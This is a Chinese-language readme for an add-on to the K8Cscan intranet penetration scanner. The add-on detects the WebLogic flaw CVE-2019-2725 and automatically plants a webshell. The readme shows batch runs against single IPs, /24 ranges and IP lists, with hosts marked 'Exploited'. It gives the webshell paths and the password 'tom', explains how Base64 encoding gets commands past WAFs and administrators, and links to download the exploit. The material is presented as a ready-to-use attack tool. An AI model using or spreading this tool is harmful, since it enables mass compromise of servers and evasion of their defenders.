主程序: K8Cscan 大型内网渗透自定义扫描器
https://www.cnblogs.com/k8gege/p/10519321.html
WeblogicScan插件
K8Cscan Moudle WeblogicScan & Exploit
目前仅支持漏洞编号 CNVD-C-2019-48814
该版本为探测weblogic漏洞并自动GetShell
外网可当成EXP使用,也可内网自动渗透用
无论内外网均可批量(填写ip或ip段列表即可)
(弄exp的时候还没CVE,所以回显写着CNVD,过了两天才有CVE-2019-2725,同一个漏洞不同叫法而已大家不要慌)
3.6支持URL和IP端口
用法:
K8cmdshell 向两个默认路径上传webshell
使用飞刀cmd连接,经过Base64加密可过waf
传输CMD命令不加密,容易被WAF拦截或管理员发现 http://192.168.1.106:7001/_async/shell.jsp tom
http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom
//http://192.168.1.106:7001/_async/shell.jsp tom
//http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom 指定IP(当成EXP用,填写内网或外网IP即可)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106
Cscan 3.5
By K8gege
load netscan.dll
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
Finished! 指定C段
C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106/24
Cscan 3.5
By K8gege
load netscan.dll Segment: 192.168.1.0
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.1
192.168.1.105
192.168.1.108
192.168.1.100
=============================================
onlinePC:5
Finished! 指定IP列表同目录下ip.txt(示例扫描3个IP)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe
Cscan 3.5
By K8gege
load netscan.dll
scan ip.txt (IP)
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.105
192.168.1.1
=============================================
onlinePC:3
Finished! 指定C段列表同目录下ipc.txt(示例扫描一个IP段)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe
Cscan 3.5
By K8gege
load netscan.dll
scan ipc.txt (IP/24) Segment: 192.168.1.0
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.1
192.168.1.105
192.168.1.108
=============================================
onlinePC:4
Finished!
3、下载
自动Getshell
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20%26%20Exploit.rar
仅扫描漏洞
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20Only%20Poc.rar
主程序